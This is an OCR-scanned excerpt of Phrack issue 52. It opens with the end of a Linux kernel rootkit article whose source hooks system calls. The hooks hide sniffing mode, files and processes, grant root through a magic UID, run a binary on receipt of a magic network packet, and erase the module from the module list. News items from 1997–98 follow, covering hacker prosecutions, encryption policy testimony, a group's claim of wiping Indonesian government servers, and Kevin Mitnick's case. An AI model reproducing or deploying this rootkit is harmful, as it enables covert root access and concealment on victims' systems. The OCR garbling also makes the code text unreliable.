kfree (test); 
mmm = current->mm->brk; 
ret = brk((void *) (mmm + 256)); 
if (ret < 0) 
return ret; 


memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1); 
ret = my_execve((char *) (mmm + 2), argv, envp); 
tmp = brk((void *) mmm); 
} else { 
kfree (test); 
ret = my_execve(filename, argv, envp); 


} 


return ret; 


/* 

* Trap the ioctl() system call to hide PROMISC flag on ethernet interfaces. 
* If we reset the PROMISC flag when the trojan is already running, then it 
* won’t hide it anymore (needed otherwise you’d just have to do an 

* 


"ifconfig ethO +promisc" to find the trojan). 


Ss 
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int n_ioctl (int d, 


*/ 


{ 


int tmp; 
struct ifreq ifr; 


int request, 


tmp = (*o_ioctl) (d, request, 
if (request == SIOCGIFFLAGS && 
memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq)); 


ifr.ifr_flags = ifr.ifr_flags & 
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arg); 
!'promisc) { 


unsigned long arg) 


(~“IFF_PROMISC) ; 


memcpy_tofs((struct ifreq *) arg, (struct ifreg *) 
} else if (request == SIOCSIFFLAGS) { 
memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq)); 
if (ifr.ifr_flags & IFF_PROMISC) 


promisc = 1; 
else if (!(ifr.ifr_flags & IFF_PROMISC) ) 
promisc = 0; 


} 


return tmp; 


/* 


{ 


* trojan setMAGICUID() system call. 
*/ 
int n_setuid(uid_t uid) 
int tmp; 
if (uid == MAGICUID) { 
current—>uid = 0; 
current-—>euid = 0; 


current-—>gid = 0; 
current-—>egid = 0; 
return 0; 


} 
tmp = (*o_setuid) (uid); 
return tmp; 


/* 


* trojan getdents() system call. 


int n_getdents(unsigned int fd, 


{ 


*/ 


unsigned int tmp, n; 
int t, proc = 0; 
struct inode *dinode; 


struct dirent *dirp2, *dirp3; 


struct dirent *dirp, 


é&ifr, sizeof(struct ifregq)); 


unsigned int count) 


tmp = (*o_getdents) (fd, dirp, count); 
ifdef _— LINUX_DCACHE_H 
dinode = current-—>files-—>fd[fd]->f_dentry->d_inode; 
else 
dinode = current-—>files->fd[fd]->f_inode; 
endif 
if (dinode->i_ino == PROC_ROOT_INO && 
proc.= di; 
if (tmp > 0) { 
dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL) ; 


memcpy_fromfs(dirp2, 
dirp3 = dirp2; 
t = tmp; 


dirp, 


tmp) ; 


!'MAJOR (dinode->i_dev) && MINOR(dinode->i_dev) = 
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while (t > 0) { 
n = dirp3->d_reclen; 


t=" n; 
if ((strstr((char *) &(dirp3->d_name), (char *) &mtroj) != NULL) \ 
|| (proc && invisible (myatoi(dirp3->d_name)))) { 
if (t != 0) 
memmove (dirp3, (char *) dirp3 + dirp3->d_reclen, t); 
else 
dirp3->d_off = 1024; 
tmp == ny; 
} 
if (dirp3->d_reclen == 0) { 
/* 


* workaround for some shitty fs drivers that do not properly 
* feature the getdents syscall. 
*/ 


dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen) ; 


memcpy_tofs(dirp, dirp2, tmp); 
kfree(dirp2) ; 
} 


return tmp; 


Trojan socketcall system call 
* executes a given binary when a packet containing the magic word is received. 
* WARNING: THIS IS REALLY UNTESTED UGLY CODE. MAY CORRUPT YOUR SYSTEM. 
*/ 


int n_socketcall(int call, unsigned long *args) 


{ 


int ret, ret2, compt; 

char *t = RECVEXEC; 

unsigned long *sargs = args; 
unsigned long a0, al, mmm; 
void *buf; 


ret = (*o_socketcall) (call, args); 

if (ret == MAGICSIZE && call == SYS_RECVFROM) { 
a0 = get_user(sargs); 
al = get_user(sargs + 1); 


buf = kmalloc(ret, GFP_KERNEL); 
memcpy_fromfs(buf, (void *) al, ret) 


for (compt = 0; compt < ret; compt+t) 
if (((char *) (buf)) [compt] == 0) 
((char *) (buf))[compt] = 1; 


if (strstr(buf, mtroj)) { 

kfree (buf); 

ret2 = fork(); 

if (ret2 == 0) { 
mmm = current->mm->brk; 
ret2 = brk((void *) (mmm + 256)); 
memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1); 

/* Hope the execve has been successfull otherwise you’ll have 2 copies of the 
master process in the ps list :] */ 

ret2 = my_execve((char *) mmm + 2, NULL, NULL); 


} 
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return ret; 


/* 
* module initialization stuff. 
os 
int init_module (void) 
{ 
/* module list cleaning */ 
/* would need to make a clean search of the right register 
* in the function prologue, since gcc may not always put 
* struct module *mp in %ebx 


* Try Sebx, Sedi, Sebp, well, every register actually :) 
Ky 


register struct module *mp asm("%ebx") ; 


*(char *) (mp->name) = 0; 
mp->size = 0; 
mp->ref = 0; 
/* 
* Make it unremovable 
*/ 
/* MOD_INC_USE_COUNT; 
*/ 
o_get_kernel_syms = sys_call_table[SYS_get_kernel_syms]; 
sys_call_table[SYS_get_kernel_syms] = (void *) n_get_kernel_syms; 


o_getdents = sys_call_table[SYS_getdents]; 
sys_call_table[SYS_getdents] = (void *) n_getdents; 


o_setuid = sys_call_table[SYS_setuid]; 
sys_call_table[SYS_setuid] = (void *) n_setuid; 


__NR_myexecve = 164; 


while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0) 
__NR_myexecve--; 

o_execve = sys_call_table[SYS_execve]; 

if (__NR_myexecve != 0) { 
sys_call_table[__NR_myexecve] = o_execve; 
sys_call_table[SYS_execve] = (void *) n_execve; 

} 

promisc = 0; 

o_ioctl = sys_call_table[SYS_ioctl]; 

sys_call_table[SYS_ioctl] = (void *) n_ioctl; 

o_socketcall = sys_call_table[SYS_socketcall]; 

sys_call_table[SYS_socketcall] = (void *) n_socketcall; 


return 0; 


void cleanup_module (void) 


{ 


sys_call_table[SYS_get_kernel_syms] = o_get_kernel_syms; 
sys_call_table[SYS_getdents] = o_getdents; 
sys_call_table[SYS_setuid] = o_setuid; 
sys_call_table[SYS_socketcall] = o_socketcall; 
if (__NR_myexecve != 0) 

sys_call_table[__NR_myexecve] = 0; 
sys_call_table[SYS_execve] = o_execve; 


sys_call_table[SYS_ioctl] = o_ioctl; 
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----[ EOF 


19.txt Wed Apr 26 09:43:42 2017 1 
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 19 of 20 


ea 
= 
n 


[ PHRACK WORLD N I 
Phrack World News - 52 


New categorization: 
-[{ Stories 
[ Book Releases 
-[ Conventions 
[ Other Headlines of Interest 


Toe oe [ Issue 52 


Oxl: Hacker Acquitted & Iraq Computerises 

Ox2: The Impact of Encryption on Public Safety 

0x3: Urban Ka0Os -- 26 Indonesian Servers Haxed 

Ox4: Hacker accused of sabotaging Forbes computers 

Ox5: Privacy, Inc. Unveils its Internet Background Check 
Ox6: Commerce Dept encryption rules declared unconstitutional 
Ox7: The Million Dollar Challenge 

Ox8: High Profile Detain Seeks Legal Help 

Ox9: Kevin Mitnick Press Release 

Oxa: SAFE crypto bill cracked again 

Oxb: RC5 Cracked - The unknown message is... 

Oxc: Kashpureff in custody. 

Oxd: XS4ALL refuses Internet tap 

Oxe: The FCC Wants V-Chip in PCs too 


1x1: Book Title: Underground (review) 
1x2: Book Title: The Electronic Privacy Papers 
1x3: Book Title: "Computer Security and Privacy: An Information Sourcebook.. 


2x0: Convention: <none> 


3x1: Misc: Civil Liberties Groups ask FCC to Block FBI Proposal 
3x2: Misc: Anti-Spam Bills in Congress 

3x3: Misc: Justice Dept Charges Microsoft.. 

3x4: Misc: Small Minds Think Alike 

3x5: Misc: Cyber Promotions tossed offline 


Ox1l> 
[submitted by: the wizard of id] 

Phrack, 

I thought that you guys may be able to make use of these articles which I 
found in my newspaper’s IT section. Perhaps you should pass them on to the 
editors of Phrack World News. 


<start article 1> 


Hacker Acquitted 


Extract from The Age, Victoria, Australia. —-Tuesday 
11/25/97 


The US Air Force failed last Friday to convince Woolwich Crown Court in 
the UK that Matthew Bevan, 23, hacked into its secret files with his home 
computer. Computer guru Bevan was cleared of all accusations, which led to 
fears of US national security risk. He was charged with three offences of 
"unauthorised access and modification" into sensitive research and 
development files at New York’s Griffiss Air Force Base and Lockheed Space 
and Missle Company in California via the Internet. 
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<end article 1> 


The article is accompanied by a very cool picture of Bevan in a black 
suit, wearing mirrored sunglasses. :) 


<start article 2> 


Iraq Computerises 


Extract from The Age, Victoria, Australia. —-Tuesday 
11/25/97 


To conceal its deadliest arms from U.N. weapons inspectors, Iraq increasingly 
has turned to computers, including American brands sold to Baghdad since 

the end of the 1991 Persian Gulf War in violation of international sanctions, 
according to US officials and U.N. diplomats. 


Iraq is using mostly Western-made computers for two cirtical functions: To 
transfer data from bulky paper to small disks that they can easilly 
disperse, making the information difficult for U.N. weapons inspection 
teams to track. 


For research and development in all four categories of weapons Iraq has 
been forbidden from keeping under terms of the U.N. resolution ending the 
war — nuclear, chemical and biological weapons and long-rnge missiles. 


Because of shifting tactics, computer specialists have become an ever mor 
important component of the weapons inspections teams, US and U.N. sources 
say. 


Their work often involves digging into hard drives and unearthing material 
that was erased after being transferred to disks. 


<end article 2> 


Ox2> 


[submitted by: Mike Kretsch] 


Statement of Louis J. Freeh, Director 
Federal Bureau of Investigation 


Before the Permanent Select Committee on 
Intelligence, United States House of Representatives 
Washington, D. C. 

September 9, 1997 


This man must be stopped. For other fun reading, 
check out his statements about the FBI’s International 
Crime fighting efforts. Errrr. Wasnt international 
supposed to be CIA and domestic FBI? 


The Impact of Encryption 
on Public Safety 


Statement of Louis J. Freeh, Director 
Federal Bureau of Investigation 


Before the Permanent Select Committee on Intelligence 
United States House of Representatives 


Washington, D. C. 
September 9, 1997 


Mr. Chairman and members of the committee, I appreciate the opportunity to 
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discuss the issue of encryption and I applaud your willingness to deal with 
this vital public safety issue. 


The looming spectre of the widespread use of robust, virtually unbreakable 
encryption is one of the most difficult problems confronting law enforcement 
as the next century approaches. At stake are some of our most valuable and 
reliable investigative techniques, and the public safety of our citizens. 

We believe that unless a balanced approach to encryption is adopted that 
includes a viable key management infrastructure that supports immediate 
decryption capabilities for lawful purposes, our ability to investigate 

and sometimes prevent the most serious crimes and terrorism will be severely 
impaired. Our national security will also be jeopardized. 


For law enforcement, framing the issue is simple. In this time of dazzling 
telecommunications and computer technology where information can have 
extraordinary value, the ready availability of robust encryption is 
essential. No one in law enforcement disputes that. Clearly, in today’s 
world and more so in the future, the ability to encrypt both contemporaneous 
communications and stored data is a vital component of information security. 


As is so often the case, however, there is another aspect to the encryption 
issue that if left unaddressed will have severe public safety and national 
security ramifications. Law enforcement is in unanimous agreement that the 
widespread use of robust unbreakable encryption ultimately will devastate 
our ability to fight crime and prevent terrorism. Unbreakable encryption 
will allow drug lords, spies, terrorists and even violent gangs to 
communicate about their crimes and their conspiracies with impunity. We wll 
lose one of the few remaining vulnerabilities of the worst criminals and 
terrorists upon which law enforcement depends to successfully investigate 
and often prevent the worst crimes. 


For this reason, the law enforcement community is unanimous in calling for 

a balanced solution to this problem. Such a solution must satisfy both the 
commercial needs of industry for strong encryption and law enforcement’s 
public safety decryption needs. In our view, any legislative approach that 
does not achieve such a balanced approach seriously jeopardizes the 
long-term viability and usefulness of court-authorized access to transmitted 
as well as stored evidence and information. Electronic surveillance and 
search and seizure are techniques upon which law enforcement depends to 


ensure public safety and maintain national security. 


One such balanced solution to this problem is key recovery encryption. 
Under this approach, a decryption "key" for a given encryption product is 
deposited with a trustworthy key recovery agent for safe keeping. The key 
recovery agent could be a private company, a bank, or other commercial or 
government entity that meets established trustworthiness criteria. Should 
encryption users need access to their encrypted information, they could 
obtain the decryption key from the key recovery agent. Additionally, when 
law enforcement needs to decrypt criminal-related communications or computer 
files lawfully seized under established legal authorities, they too, under 
conditions prescribed by law and with the presentation of proper legal 
process, could obtain the decryption key from the key recovery agent. This 
is the only viable way to permit the timely decryption of lawfully seized 
communications or computer files that are in furtherance of criminal 
activity. 


The decryption key or information would be provided to the law enforcement 
agency under very strict controls and would be used only for its intended 
public safety purpose. Under this approach, the law-abiding would gain the 
benefits of strong, robust encryption products and services with emergency 
decryption capabilities and public safety and national security would be 
maintained--as manufacturers produce and sell encryption products that 
include features that allow for the immediate decryption of criminal-related 
encrypted communications or electronic information. 


This solution meets industry’s information security and communications 
privacy needs for strong encryption while addressing law enforcement’s 
public safety needs for immediate decryption when such products are used 
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to conceal crimes or impending acts of terrorism or espionage. 


Some have argued that government policy makers should step aside and let 
market forces solely determine the direction of key recovery encryption, 
letting market forces determine the type of technologies that will be used 
and under what circumstances. They argue that most corporations that see 
the need for encryption will also recognize the need for, and even insist 
on, key recovery encryption products to secure their electronically stored 
information and to protect their corporate interests should an encryption 
key be lost, stolen or used by a rogu mploy for extortion purposes. 


We agree that rational thinking corporations will act in a prudent manner 
and will insist on using key recovery encryption for electronically stored 
information. However, law enforcement has a unique public safety requirement 
in the area of perishable communications which are in transit (telephone 
calls, e-mail, etc.). It is law enforcement, not corporations, that 

has a need for the immediate decryption of communications in transit. There 
is extraordinary risk in trusting public safety and national security to 
market forces that rightfully are protecting important but unrelated 
interests. Law enforcement’s needs will not be adequately addressed by 

this type of an approach. 


It is for this reason that government policy makers and Congress should 
play a direct role in shaping our national encryption policy and adopt a 
balanced approach that addresses both the commercial and the public safety 
needs. The adverse impact to public safety and national security associated 
with any type of "wait and see" or voluntary market force approach would 

be far too great of a price for the American public to pay. 


Several bills have recently been introduced which address encryption. 
Language in some of the proposed bills makes it unlawful to use encryption 
in the furtherance of criminal activity and set out procedures for law 
enforcement access to stored decryption keys in those instances where 

key recovery encryption was voluntarily used. Only one of these bills, 

S. 909, comes close to meeting our core public safety, effective law 
enforcement, and national security needs. S. 909 takes significant strides 
i 

5a 

A 

a 


n the direction of protecting public safety by encouraging the use of key 
ecovery encryption through market based incentives and other inducements. 
ll of the other bills currently under consideration by the Congress, to 
nclude S. 376, S. 377 , and H.R. 695, would have a significant negative 
impact on public safety and national security and would risk great harm 

to our ability to enforce the laws and protect our citizens if enacted. 


Unfortunately, S. 909 still does not contain sufficient assurances that 

the impact on public safety and effective law enforcement caused by the 
widespread availability of encryption will be adequately addressed. We look 
forward to working with you to develop legislative accommodations that 
adequately address the public safety needs of law enforcement and a balanced 
encryption policy. 


Further, some argue th neryption "Genie is out of the bottle," and that 
attempts to influence the future use of encryption are futile. I do not 
believe that to be the case. Strong encryption products that include 
decryption features for lawful purposes can, with government and industry 
support, become the standard for use in the global information 
infrastructure. 


No one contends that the adoption of a balanced encryption policy will 
prevent all criminals, spies and terrorists from gaining access to and 
using unbreakable encryption. But if we, as a nation, act responsibly 
and only build systems and encryption products that support and include 
appropriate decryption features, all facets of the public’s interest can 
be served. 


And as this committee knows, export controls on encryption products exist 
primarily to protect national security and foreign policy interests. 
However, law enforcement is more concerned about the significant and 
growing threat to public safety and effective law enforcement that would 
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be caused by the proliferation and use within the United States of a 
communications infrastructure that supports the use of strong encryption 
products but that does not support law enforcement’s immediate decryption 
needs. Without question, such an infrastructure will be used by dangerous 
criminals and terrorists to conceal their illegal plans and activities 
from law enforcement, thus inhibiting our ability to enforce the laws 

and prevent terrorism. 


Congress has on many occasions accepted the premise that the use of 
electronic surveillance is a tool of utmost importance in terrorism cases 
and in many criminal investigations, especially those involving serious 
and violent crime, terrorism, espionage, organized crime, drug-trafficking, 
corruption and fraud. There have been numerous cases where law enforcement, 
through the use of electronic surveillance, has not only solved and 
successfully prosecuted serious crimes and dangerous criminals, but has 
also been able to prevent serious and life-threatening criminal acts. For 
example, terrorists in New York were plotting to bomb the United Nations 
building, the Lincoln and Holland tunnels, and 26 Federal Plaza as well as 
conduct assassinations of political figures. Court-authorized electronic 
surveillanc nabled the FBI to disrupt the plot as explosives were being 
mixed. Ultimately, the evidence obtained was used to convict the 
conspirators. In another example, electronic surveillance was used to 
prevent and then convict two men who intended to kidnap, molest and then 
kill a male child. 


Most encryption products manufactured today do not contain features that 
provide for immediate law enforcement decryption. Widespread use of 
unbreakable encryption or communications infrastructure that supports the 
use of unbreakable encryption clearly will undermine law enforcement’s 
ability to effectively carry out its public safety mission and to combat 
dangerous criminals and terrorists. 


This is not a problem that will begin sometime in the future. Law 
enforcement is already encountering the harmful effects of encryption 
in many important investigations today. For example: 


convicted spy Aldrich Ames was told by the Russian Intelligence 
Service to encrypt computer file information that was to be passed 

to them. an international terrorist was plotting to blow up 11 
U.S.-owned commercial airliners in the Far East. His laptop computer 
which was seized during his arrest in Manilla contained encrypted 
files concerning this terrorist plot. a subject in a child pornography 
case used encryption in transmitting obscene and pornographic images 
of children over the Internet. a major international drug trafficking 
subject recently used a telephon neryption device to frustrate 
court-approved electronic surveillance. 


Requests for cryptographic support pertaining to electronic surveillance 
interceptions from FBI field offices and other law enforcement agencies 

have steadily risen over the past several years. For example, from 1995 

to 1996, there was a two-fold increase (from 5 to 12) in the number of 
instances where the FBI’s court-authorized electronic efforts were frustrated 

by the use of encryption products that did not allow for lawful law 
nforcement decryption. 


Over the last three (3) years, the FBI has also seen the number of 
computer-related cases utilizing encryption and/or password protection 
increase from 20 or two (2) percent of the cases involving electronically 
stored information to 140 or seven (7) percent. These included the use of 
56-bit data encryption standard (DES) and 128-bit "pretty good privacy" 
(PGP) encryption. 


Just as when the Congress so boldly addressed the digital telephony issue 

in 1994, the government and the nation are again at an historic crossroad 

on this issue. The Attorney General and the heads of federal law enforcement 
agencies as well as the presidents of several state and local law enforcement 
associations recently sent letters to every member of Congress urging the 
adoption of a balanced encryption policy. In addition, the International 
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Association of Chiefs of Police, the National Sheriff’s Association and 
the National District Attorneys Association have all enacted resolutions 
supporting a balanced encryption policy and opposing any legislation that 
undercuts or falls short such a balanced policy. 


If public policy makers act wisely, the safety of all Americans will be 
enhanced for decades to come. But if narrow interests prevail, then law 
enforcement will be unable to provide the level of protection that people 
in a democracy properly expect and deserve. 


Conclusion 


We are not asking that the magnificent advances in encryption technology 

be abandoned. We are the strongest proponents of robust, reliable encryption 
manufactured and sold by American companies all over the world. Our position 
is simple and, we believe, vital. Encryption is certainly a commercial 
interest of great importance to this great nation. But it’s not merely a 
commercial or business issue. To those of us charged with the protection of 
public safety and national security, encryption technology and its 
application in the information age--here at the dawn of the 21st century 

and thereafter--will become a matter of life and death in many instances 
which will directly impact on our safety and freedoms. Good and sound 

public policy decisions about encryption must be made now by the Congress 
and not be left to privat nterprise. Legislation which carefully balances 
public safety and private enterprise must be established with respect to 
encryption. 


Would we allow a car to be driven with features which would evade and outrun 
police cars? Would we build houses or buildings which firefighters could not 
enter to save people? 


Most importantly, we are not advocating that the privacy rights or personal 
security of any person or enterprise be compromised or threatened. You can’t 
yell "fire" in a crowded theater. You can’t with impunity commit libel or 
slander. You can’t use common law honored privileges to commit crimes. 


In support of our position for a rational encryption policy which balances 
public safety with the right to secure communications, we rely on the Fourth 
Amendment to the Constitution. There the framers established a delicat 
balance between "the right of the people to be secure in their persons, 
houses, papers, and effects (today we might add personal computers, modems, 
data streams, discs, etc.) against unreasonable searches and seizures." 
Those precious rights, however, were balanced against the legitimate right 
and necessity of the police, acting through strict legal process, to gain 
access by lawful search and seizure to the conversations and stored evidence 
of criminals, spies and terrorists. 


The precepts and balance of the Fourth Amendment have not changed or altered. 
What has changed from the lat ighteenth to the late twentieth century is 
technology and telecommunications well beyond the contemplation of the 
framers. 


The unchecked proliferation of unbreakable encryption will drastically 
change the balance of the Fourth Amendment in a way which would shock its 
original proponents. Police soon may be unable through legal process and 
with sufficient probable cause to conduct a reasonable and lawful search 
or seizure, because they cannot gain access to evidence being channeled or 
stored by criminals, terrorists and spies. Significantly, their lack of 
future access may be in part due to policy decisions about encryption made 
or not made by the United States. This would be a terrible upset of the 
balance so wisely set forth in the Fourth Amendment on December 15, 1791. 
I urge you to maintain that balance and allow your police departments, 
district attorneys, sheriffs and federal law enforcement authorities to 
continue to use their most effective techniques to fight crime and 
terrorism—-techniques well understood and authorized by the framers and 
Congress for over two hundred years. 


I look forward to working with you on this matter and at this time would 
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be pleased to answer any questions. 


Ox3> 


Subject: Urban Ka0Os -- 26 Indonesian Servers Haxed 


Greetings Phrack, 


Today, our group (Urban Ka0s) and several portuguese Hackers attacked 
several Indonesian servers, in order to defend East Timor rights! 


We are Portuguese Hackers Agaisnt Indonesian Tirany. 


"Thix Site Was Haxed & Deleted by PHAiT. This attack is not 
against indonesian people but against its government and their 
opression towards the republic of timor. These actions were 
made to honour and remember all the 250 people killed in Dili 
on the 12 november 1991. 


As a result all sites belonging to indonesia’s goverment were 
rased, the rest only had their webpages changed." 


East Timor, One People, One Nation 


"Whether it is in Tibet or Poland, the Baltics or the 

South Pacific, Africa or the Caribbean, it has been shown 
that force and repression can never totally suffocate the 
reasons underlying the existence of a people: pride in its 
own identity, capacity to preserve, without restriction, 
everything that identifies it as such, freedom to pass all 
this on to future generations, in brief, the right to manage 
its own destiny." 


Xanana Gusmo 
October 5, 1989 


Please inform all ciber citizens of this action. 


Our contact is at: 

-- Urban Ka0s -- 
http://urbankaos.org 

irc: PT-Net irc.urbankaos.org 


O0x4> 


Title: Hacker accused of sabotaging Forbes computers 
Source: Infobeat News 

Author: unknown 

Date: unknown 


A former temporary computer technician at business publisher Forbes 
Inc has been charged with sabotage and causing a massive crash of the 
firm’s computer network, prosecutors said. According to the complaint 
filed in Manhattan Federal Court and unsealed Monday, George Mario 
Parente, 30, of Howard Beach in the borough of Queens was accused of 
hacking his way into the Forbes’ network in April from his home, 
using an unauthorized password. Prosecutors alleged h rased vital 
information including budgets and salary from Forbes’ computers 
because he was angry with the company after he was fired. 


Ox5> 


Title: Privacy, Inc. Unveils its Internet Background Check 
Source: 

Author: unknown 

Date: August 1, 1997 
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Aurora, Colorado 


Privacy, Inc. (www.privacyinc.com) today released its Internet Background 
Check, a utility that empowers users to determine if they are at risk from 
the plethora of databases that are being placed on the Internet. Searches 
quickly scan through hundreds of databases beng placed on-line by state and 
local governments and law enforcement angencies in categories such as: 


* Registered Sex Offenders and Predators 
* Deadbeat Parents 

* Wanted Persons 
* 
* 


Missing Persons 
Arrest/Prison 


‘The Computer Is Never Wrong’ 


"Errors and risks of mistaken identity in this data are a key concern," says 
Edward Allburn, founder and president of Privacy, Inc. The recent flurry of 
activity by government and law enforcement agencies to distribute such 
volatile information on the Internet creates an environment that potentially 
places innocent people at risk, especially for mistaken identity. 


Advanced technology was incorporated into the development of the Internet 
Background Check with this risk in mind. This technology allows users to 
also search for names that look and/or sound similar to their own while still 
delivering highly focused results that standard Internet search engines 

(such as Yahoo! and Lycos) are incapable of producing. 


One More Tool 


The release provides one more tool for consumers to protect themselves in the 
Information Age. Additional resources provided by Privacy, Inc. include: 
Consumer Privacy Guide 

Government Database Guide 

Government Dossier Service 

David Sobel’s Legal FAQ 

Privacy News Archive, updated weekly 


+ + F 


Guido, the Cyber-Bodyguard is another utility planned to be released in the 
coming months. Guido will interface with the Internet Background Check to 
automatically alert users via e-mail if/when their name appears in a new or 
updated database, in effect monitoring the Internet so users don’t have to. 


Ox6> 


Title: Commerce Dept encryption rules declared unconstitutional 
Source: fight-censorship@vorlon.mit.edu 

Author: unknown 

Date: unknown 


A Federal judge in San Francisco ruled today that the Commerce 
Department’s export controls on encryption products violate the 
First Amendment’s guarantees of freedom of speech. 


In a 35-page decision, U.S. District Judge Marilyn Patel said the 
Clinton administration’s rules violate "the First Amendment on the 
grounds of prior restraint and are, therefore, unconstitutional." 
Patel reaffirmed her December 1996 decision against the State 
Department regulations, saying that the newer Commerce Department 
rules suffer from similar constitutional infirmities. 


Patel barred the government from "threatening, detaining, 
prosecuting, discouraging, or otherwise interfering with" anyone 
"who uses, discusses, or publishes or seeks to use, discuss or 
publish plaintiff’s encryption programs and related materials." 
Daniel Bernstein, now a math professor at the University of 
Illinois, filed the lawsuit with the help of the Electronic 
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Frontier Foundation. 


Patel dismissed the State, Energy, and Justice departments and 
CIA as defendants. President Clinton transferred jurisdiction over 
encryption exports from the State to the Commerce department on 
December 30, 1996. 


The Justice Department seems likely to appeal the ruling to the 
Ninth Circuit, which could rule on the case in the near future. 


Ox7> 


Title: The Million Dollar Challenge 
Source: unknown mail list 


Ultimate Privacy, the e-mail encryption program combining ease 
of use with unbreakability. 


Ultimate Privacy is serious cryptography. On the Links page we 
have links to other Internet sites that discuss One-Time Pad 
cryptography and why it is unbreakable when properly 
implemented. 


Nevertheless, should you wish to try, the first person to be able 
to discern the original message within a year (following the 
simple requirements of the Challenge) will actually receive the 
million dollar prize as specified in the Rules page. The priz 

is backed by the full faith and credit of Crypto-Logic 
Corporation and its insurors. 


You might be interested in to know how the Challenge was done. We 
used a clean, non-network-connected computer. After installing 
Ultimate Privacy, one person alon ntered the Challenge message 
and encrypted it. After making a copy of the encrypted message, 

we removed the hard disk from the computer and it was 

immediately transported to a vault for a year. 


Therefore, the original message is not known by Crypto-Logic 
Corporation staff (other than the first few characters for 
screening purposes), nor are there any clues to the original 
message on any media in our offices. 


Ox8> 


Title: High Profile Detain Seeks Legal Help 
Source: fight-censorship@vorlon.mit.edu 
Author: unknown 

Date: September 3, 1997 


Mr. Kevin Mitnick has been detained in Federal custody without 
bail on computer "hacking" allegations for over thirty months. 
Having no financial resources, Mr. Mitnick has been appointed 
counsel from the Federal Indigent Defense Panel. As such, Mr. 
Mitnick’s representation is limited; his attorney is not permitted 
to assist with civil actions, such as filing a Writ of Habeas 
Corpus. 


For the past two years, Mr. Mitnick has attempted to assist in his 
own defense by conducting legal research in the inmate law library 
at the Metropolitan Detention Center (hereinafter "MDC") in Los 
Angeles, California. Mr. Mitnick’s research includes reviewing 
court decisions for similar factual circumstances which have 
occurred in his case. MDC prison officials have been consistently 
hampering Mr. Mitnick’s efforts by denying him reasonable access 
to law library materials. Earlier this year, Mr. Mitnick’s lawyer 
submitted a formal request to Mr. Wayne Siefert, MDC Warden, 
seeking permission to allow his client access to the law library 
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on the days set aside for inmates needing extra law library time. 
The Warden refused. 


In August 1995, Mr. Mitnick filed an administrative remedy request 
with the Bureau of Prisons complaining that MDC policy in 
connection with inmate access to law library materials does not 
comply with Federal rules and regulations. Specifically, the 
Warden established a policy for MDC inmates that detracts from 
Bureau of Prison’s policy codified in the Code of Federal 
Regulations. 


Briefly, Federal law requires the Warden to grant additional law 
library time to an inmate who has an "imminent court deadline". 
The MDC’s policy circumvents this law by erroneously interpreting 
the phrase "imminent court deadline" to include other factors, 
such as, whether an inmate exercises his right to assistance of 
counsel, or the type of imminent court deadline. 

For example, MDC policy does not consider detention (bail), 
motion, status conference, or sentencing hearings as imminent 
court deadlines for represented inmates. MDC officials use this 
policy as a tool to subject inmates to arbitrary and capricious 
treatment. It appears MDC policy in connection with inmate legal 
activities is inconsistent with Federal law and thereby affects 
the substantial rights of detainees which involve substantial 
liberty interests. 


In June 1997, Mr. Mitnick finally exhausted administrative 
remedies with the Bureau of Prisons. Mr. Mitnick’s only avenue of 
vindication is to seek judicial review in a Court of Law. Mr. 
Mitnick wishes to file a Writ of Habeas Corpus challenging his 
conditions of detention, and a motion to compel Federal 
authorities to follow their own rules and regulations. 


Mr. Mitnick is hoping to find someone with legal experience, such 
as an attorney or a law student willing to donate some time to 
this cause to insure fair treatment for everyone, and to allow 
detainees to effectively assist in their own defense without 
"Government" interference. Mr. Mitnick needs help drafting a 
Habeas Corpus petition with points and authorities to be submitted 
by him pro-se. His objective is to be granted reasonable access 
to law library materials to assist in his own defense. 


If you would like to help Kevin, please contact him at the 
following address: 


Mr. Kevin Mitnick 

Reg. No. 89950-012 

P.O. Box 1500 

Los Angeles, CA 90053-1500 


Ox9> 


Title: Kevin Mitnick Press Release 
Source: Press Releas 

Author: Donald C. Randolph 

Date: August 7, 1997 


THE UNITED STATES V. KEVIN DAVID MITNICK 
I. Proceedings to Date 


With 25 counts of alleged federal computer and wire fraud violations still 
pending against him, the criminal prosecution of Kevin Mitnick is 
approaching its most crucial hour. The trial is anticipated to begin in 
January, 1998. In reaching this point, however, Kevin has already 
xperienced years of legal battles over alleged violations of the 
conditions of his supervised release and for possession of unauthorized 
cellular access codes. 
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A. Settling the "Fugitive" Question 


The seemingly unexceptional charges relating to supervised releas 
violations resulted in months of litigation when the government attempted 
to tack on additional allegations for conduct occurring nearly three years 
after the scheduled expiration of Kevin’s term of supervised release in 
December, 1992. The government claimed that Kevin had become a fugitive 
prior to the expiration of his term, thereby "tolling" the term and 
allowing for the inclusion of additional charges. After months of 
increasingly bold assertions concerning Kevin’s "fugitive" status, 
evidentiary hearings were held in which the government was forced to 
concede that its original position in this matter was unsupported by the 
facts. 


B. Sentencing 


In June of this year Kevin was sentenced for certain admitted violations of 
his supervised release and for possession of unauthorized access codes. 

The court imposed a sentence of 22 months instead of the 32 months sought 
by the government. Since Kevin has been in custody since his arrest in 
February 1995, this sentence has been satisfied. We are currently 
preparing a request for release on bail. 


During this stage of the proceedings, the government sought to impose 
restrictions on Kevin’s access to computers which were so severe as to 
virtually prohibit him from functioning altogether in today’s society. The 
proposed restrictions sought to completely prohibit Kevin from "using or 
possessing" all computer hardware equipment, software programs, and 
wireless communications equipment. After arguments that such restrictions 
unduly burdened Kevin’s freedom to associate with the on-line computer 
community and were not reasonably necessary to ensure the protection of the 
public, the court modified its restrictions by allowing for computer access 
with the consent of the Probation Office. Nonetheless, the defense 
believes that the severe restrictions imposed upon Mr. Mitnick are 
unwarranted in this case and is, therefore, pursuing an appeal to the Ninth 
ClreuLe: 


II. The Government Seeks to make an Example of Mr. Mitnick 


One of the strongest motivating factors for the government in the 
prosecution of Kevin Mitnick is a desire to send a message to other 
would-be "hackers". The government has hyped this prosecution by 
exaggerating the value of loss in the case, seeking unreasonably stiff 
sentences, and by painting a portrait of Kevin which conjures the likeness 
of a cyber-boogie man. 


There are a number of objectives prompting the government’s tactics in this 
respect. First, by dramatically exaggerating the amount of loss at issue 
in the case (the government arbitrarily claims losses exceed some $80 
million) the government can seek a longer sentence and create a 
